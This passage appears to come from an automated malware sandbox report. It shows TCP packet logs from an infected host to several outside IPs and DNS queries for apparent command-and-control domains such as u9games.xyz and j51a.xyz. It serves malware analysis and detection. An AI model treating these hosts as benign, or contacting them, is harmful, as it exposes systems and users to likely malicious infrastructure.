                                                      Jul 9, 2024 12:10:14.472342968 CEST8049744162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:14.472397089 CEST8049744162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:14.472450972 CEST8049744162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:14.472534895 CEST4974480192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:15.309700966 CEST4974480192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:16.344990969 CEST4974580192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:16.354706049 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.354912043 CEST4974580192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:16.382255077 CEST4974580192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:16.387859106 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.950479031 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.950509071 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.950525999 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.950541973 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.950557947 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.950575113 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.950608969 CEST4974580192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:16.950655937 CEST4974580192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:16.951143026 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.951159954 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.951175928 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.951191902 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.951215029 CEST4974580192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:16.951239109 CEST4974580192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:16.955658913 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.955677032 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.955693960 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.955787897 CEST4974580192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:16.955914021 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:16.956001043 CEST4974580192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:16.956021070 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:17.012005091 CEST4974580192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:17.037429094 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:17.037448883 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:17.037467957 CEST8049745162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:17.037600040 CEST4974580192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:17.888998032 CEST4974580192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:18.931778908 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:18.939820051 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:18.940527916 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:18.963701010 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:18.969213009 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:18.969255924 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.623357058 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.623385906 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.623403072 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.623419046 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.623435974 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.623451948 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.623456001 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:19.623469114 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.623507977 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:19.623507977 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:19.623610020 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.623625994 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.623641968 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.623656988 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:19.623675108 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:19.628585100 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.628655910 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.628674030 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.628698111 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:19.682997942 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:19.713958979 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.714013100 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.714056015 CEST8049746162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:19.714107990 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:19.714140892 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:20.481473923 CEST4974680192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:21.520001888 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:21.526151896 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:21.526241064 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:21.548355103 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:21.553319931 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168304920 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168358088 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168391943 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168430090 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168425083 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.168463945 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168519020 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.168581009 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168613911 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168622971 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.168648958 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168689013 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.168808937 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168839931 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.168879986 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.173526049 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.173696041 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.173728943 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.173748970 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.173789978 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.173846960 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.260926008 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.261020899 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.261055946 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:22.261101961 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.261132002 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.272260904 CEST4974780192.168.2.9162.254.38.56
                                                      Jul 9, 2024 12:10:22.277460098 CEST8049747162.254.38.56192.168.2.9
                                                      Jul 9, 2024 12:10:27.334606886 CEST4974880192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:27.340337992 CEST80497485.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:27.340410948 CEST4974880192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:27.367615938 CEST4974880192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:27.374743938 CEST80497485.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:28.874370098 CEST4974880192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:28.881211042 CEST80497485.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:28.882991076 CEST4974880192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:29.908077955 CEST4974980192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:29.915134907 CEST80497495.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:29.915209055 CEST4974980192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:29.937726974 CEST4974980192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:29.944271088 CEST80497495.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:30.593400955 CEST80497495.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:30.593626976 CEST80497495.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:30.593746901 CEST4974980192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:31.451064110 CEST4974980192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:32.490400076 CEST4975080192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:32.495590925 CEST80497505.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:32.498229027 CEST4975080192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:32.518081903 CEST4975080192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:32.523199081 CEST80497505.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:32.523268938 CEST80497505.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:34.028971910 CEST4975080192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:34.035145998 CEST80497505.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:34.035226107 CEST4975080192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:35.065681934 CEST4975180192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:35.071759939 CEST80497515.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:35.074219942 CEST4975180192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:35.094050884 CEST4975180192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:35.099239111 CEST80497515.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:35.748955965 CEST80497515.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:35.749372959 CEST80497515.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:35.749447107 CEST4975180192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:35.759077072 CEST4975180192.168.2.95.252.229.221
                                                      Jul 9, 2024 12:10:35.766077042 CEST80497515.252.229.221192.168.2.9
                                                      Jul 9, 2024 12:10:40.808561087 CEST4975280192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:40.814110041 CEST8049752142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:40.814193964 CEST4975280192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:40.838975906 CEST4975280192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:40.844046116 CEST8049752142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:41.589036942 CEST8049752142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:41.589447975 CEST8049752142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:41.589565039 CEST4975280192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:42.361524105 CEST4975280192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:43.395874023 CEST4975380192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:43.401180983 CEST8049753142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:43.401314974 CEST4975380192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:43.430684090 CEST4975380192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:43.435786009 CEST8049753142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:44.154918909 CEST8049753142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:44.154987097 CEST8049753142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:44.155206919 CEST4975380192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:44.935451031 CEST4975380192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:46.058335066 CEST4975480192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:46.063400984 CEST8049754142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:46.063554049 CEST4975480192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:46.092117071 CEST4975480192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:46.097160101 CEST8049754142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:46.097176075 CEST8049754142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:46.793827057 CEST8049754142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:46.795486927 CEST8049754142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:46.795557022 CEST4975480192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:47.608069897 CEST4975480192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:48.671225071 CEST4975580192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:48.676171064 CEST8049755142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:48.676500082 CEST4975580192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:48.702397108 CEST4975580192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:48.707165956 CEST8049755142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:49.407016039 CEST8049755142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:49.407424927 CEST8049755142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:49.407480955 CEST4975580192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:49.417218924 CEST4975580192.168.2.9142.250.185.147
                                                      Jul 9, 2024 12:10:49.422133923 CEST8049755142.250.185.147192.168.2.9
                                                      Jul 9, 2024 12:10:54.484618902 CEST4975680192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:10:54.489489079 CEST8049756185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:10:54.489641905 CEST4975680192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:10:54.515111923 CEST4975680192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:10:54.520607948 CEST8049756185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:10:55.101762056 CEST8049756185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:10:55.101871014 CEST8049756185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:10:55.103326082 CEST4975680192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:10:56.028652906 CEST4975680192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:10:57.066118956 CEST4975780192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:10:57.071206093 CEST8049757185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:10:57.075107098 CEST4975780192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:10:57.095263958 CEST4975780192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:10:57.100610018 CEST8049757185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:10:57.710562944 CEST8049757185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:10:57.710993052 CEST8049757185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:10:57.711046934 CEST4975780192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:10:58.607000113 CEST4975780192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:10:59.646034956 CEST4975880192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:10:59.651293993 CEST8049758185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:10:59.651387930 CEST4975880192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:10:59.676304102 CEST4975880192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:10:59.683546066 CEST8049758185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:10:59.684048891 CEST8049758185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:11:00.287606955 CEST8049758185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:11:00.287676096 CEST8049758185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:11:00.287733078 CEST4975880192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:11:01.186844110 CEST4975880192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:11:02.223867893 CEST4975980192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:11:02.799158096 CEST8049759185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:11:02.800183058 CEST4975980192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:11:02.820585012 CEST4975980192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:11:02.825721025 CEST8049759185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:11:03.412784100 CEST8049759185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:11:03.412811041 CEST8049759185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:11:03.412935972 CEST4975980192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:11:03.423051119 CEST4975980192.168.2.9185.181.104.242
                                                      Jul 9, 2024 12:11:03.427871943 CEST8049759185.181.104.242192.168.2.9
                                                      Jul 9, 2024 12:11:08.928257942 CEST4976080192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:08.933208942 CEST804976038.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:08.935079098 CEST4976080192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:08.956190109 CEST4976080192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:08.962471008 CEST804976038.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:09.524163008 CEST804976038.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:09.524473906 CEST804976038.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:09.524538040 CEST4976080192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:10.466315031 CEST4976080192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:11.505327940 CEST4976180192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:11.510777950 CEST804976138.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:11.510848999 CEST4976180192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:11.535007954 CEST4976180192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:11.540147066 CEST804976138.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:12.099292040 CEST804976138.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:12.100097895 CEST804976138.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:12.100155115 CEST4976180192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:13.044090033 CEST4976180192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:14.086574078 CEST4976280192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:14.092247009 CEST804976238.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:14.092325926 CEST4976280192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:14.115359068 CEST4976280192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:14.120585918 CEST804976238.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:14.121089935 CEST804976238.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:14.693792105 CEST804976238.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:14.694212914 CEST804976238.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:14.694344044 CEST4976280192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:15.622185946 CEST4976280192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:16.657438040 CEST4976380192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:16.662671089 CEST804976338.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:16.663064957 CEST4976380192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:16.679042101 CEST4976380192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:16.684036016 CEST804976338.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:17.277434111 CEST804976338.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:17.277498007 CEST804976338.145.202.186192.168.2.9
                                                      Jul 9, 2024 12:11:17.277726889 CEST4976380192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:17.286459923 CEST4976380192.168.2.938.145.202.186
                                                      Jul 9, 2024 12:11:17.291448116 CEST804976338.145.202.186192.168.2.9

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jul 9, 2024 12:08:11.577297926 CEST6486353192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:08:11.601701975 CEST53648631.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:08:32.449065924 CEST6225853192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:08:32.782533884 CEST53622581.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:08:47.678579092 CEST6139053192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:08:47.697277069 CEST53613901.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:09:01.150284052 CEST5341753192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:09:02.136219025 CEST5341753192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:09:02.676990986 CEST53534171.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:09:02.678003073 CEST53534171.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:09:16.307128906 CEST6278253192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:09:16.550077915 CEST53627821.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:09:30.170687914 CEST6212853192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:09:30.193000078 CEST53621281.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:09:45.018733025 CEST6012253192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:09:45.038877010 CEST53601221.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:09:58.767518997 CEST5299053192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:09:59.776870966 CEST5299053192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:10:00.178251028 CEST53529901.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:10:00.178312063 CEST53529901.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:10:13.521758080 CEST5630853192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:10:13.738733053 CEST53563081.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:10:27.309645891 CEST5303653192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:10:27.323451996 CEST53530361.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:10:40.785329103 CEST6402053192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:10:40.799731970 CEST53640201.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:10:54.448087931 CEST5547053192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:10:54.475109100 CEST53554701.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:11:08.460133076 CEST5521653192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:11:08.916131020 CEST53552161.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:11:22.955046892 CEST6394353192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:11:23.394615889 CEST53639431.1.1.1192.168.2.9
                                                      Jul 9, 2024 12:11:36.844496012 CEST5596653192.168.2.91.1.1.1
                                                      Jul 9, 2024 12:11:37.052222967 CEST53559661.1.1.1192.168.2.9

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jul 9, 2024 12:08:11.577297926 CEST192.168.2.91.1.1.10x529eStandard query (0)www.u9games.xyzA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:08:32.449065924 CEST192.168.2.91.1.1.10x8b4eStandard query (0)www.dtalengineering.comA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:08:47.678579092 CEST192.168.2.91.1.1.10x8d78Standard query (0)www.alphacentura.comA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:09:01.150284052 CEST192.168.2.91.1.1.10x2cebStandard query (0)www.xn72dkd7scx.shopA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:09:02.136219025 CEST192.168.2.91.1.1.10x2cebStandard query (0)www.xn72dkd7scx.shopA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:09:16.307128906 CEST192.168.2.91.1.1.10x7363Standard query (0)www.dynamologistics.netA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:09:30.170687914 CEST192.168.2.91.1.1.10xf60dStandard query (0)www.globaltrend.xyzA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:09:45.018733025 CEST192.168.2.91.1.1.10x66b8Standard query (0)www.ffi07s.xyzA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:09:58.767518997 CEST192.168.2.91.1.1.10x9e8fStandard query (0)www.j51a.xyzA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:09:59.776870966 CEST192.168.2.91.1.1.10x9e8fStandard query (0)www.j51a.xyzA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:13.521758080 CEST192.168.2.91.1.1.10x2ea6Standard query (0)www.dospole.topA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:27.309645891 CEST192.168.2.91.1.1.10xc924Standard query (0)www.tp-consulting.netA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:40.785329103 CEST192.168.2.91.1.1.10x39b1Standard query (0)www.lexpaidshares.onlineA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:54.448087931 CEST192.168.2.91.1.1.10x4dd5Standard query (0)www.viertage.workA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:11:08.460133076 CEST192.168.2.91.1.1.10x415bStandard query (0)www.9988566a4.shopA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:11:22.955046892 CEST192.168.2.91.1.1.10xc5c2Standard query (0)www.rightol.netA (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:11:36.844496012 CEST192.168.2.91.1.1.10x5787Standard query (0)www.wegamovies.onlineA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jul 9, 2024 12:08:11.601701975 CEST1.1.1.1192.168.2.90x529eNo error (0)www.u9games.xyzghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 9, 2024 12:08:11.601701975 CEST1.1.1.1192.168.2.90x529eNo error (0)ghs.googlehosted.com142.250.185.211A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:08:32.782533884 CEST1.1.1.1192.168.2.90x8b4eNo error (0)www.dtalengineering.com103.42.108.46A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:08:47.697277069 CEST1.1.1.1192.168.2.90x8d78No error (0)www.alphacentura.com188.114.96.3A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:08:47.697277069 CEST1.1.1.1192.168.2.90x8d78No error (0)www.alphacentura.com188.114.97.3A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:09:02.676990986 CEST1.1.1.1192.168.2.90x2cebNo error (0)www.xn72dkd7scx.shopweien.cdn.youziyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 9, 2024 12:09:02.676990986 CEST1.1.1.1192.168.2.90x2cebNo error (0)weien.cdn.youziyuncdn.com134.122.138.60A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:09:02.678003073 CEST1.1.1.1192.168.2.90x2cebNo error (0)www.xn72dkd7scx.shopweien.cdn.youziyuncdn.comCNAME (Canonical name)IN (0x0001)false
